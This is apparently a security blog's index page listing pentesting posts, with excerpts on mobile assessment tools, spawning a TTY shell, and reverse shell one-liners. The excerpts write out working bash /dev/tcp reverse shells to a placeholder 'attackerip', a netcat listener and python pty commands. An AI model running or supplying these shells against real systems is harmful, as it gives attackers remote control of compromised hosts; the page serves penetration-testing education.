Passionfruit, Objection and Drozer

Setup instructions for mobile application assessment frameworks Passionfruit, Objection and Drozer. ...

August 26, 2018 · 3 min · Rizal

Spawning a TTY Shell

Often during pen tests you may obtain a shell without a TTY, yet wish to interact further with the system. Here are some commands which will allow you to spawn a TTY shell. Obviously some of this will depend on the system environment and installed packages. Shell Spawning python -c 'import pty; pty.spawn("/bin/sh")' echo os.system('/bin/bash') ...

July 27, 2017 · 1 min · Rizal

Reverse Shell One Liners

There may be occasions where you have code execution on a target machine and sit there wondering what to do next. Well, here is what you can do. Set up a netcat listener on port 4444. nc -nvlp 4444 Bash exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done bash -i >& /dev/tcp/attackerip/4444 0>&1 ...

September 1, 2016 · 2 min · Rizal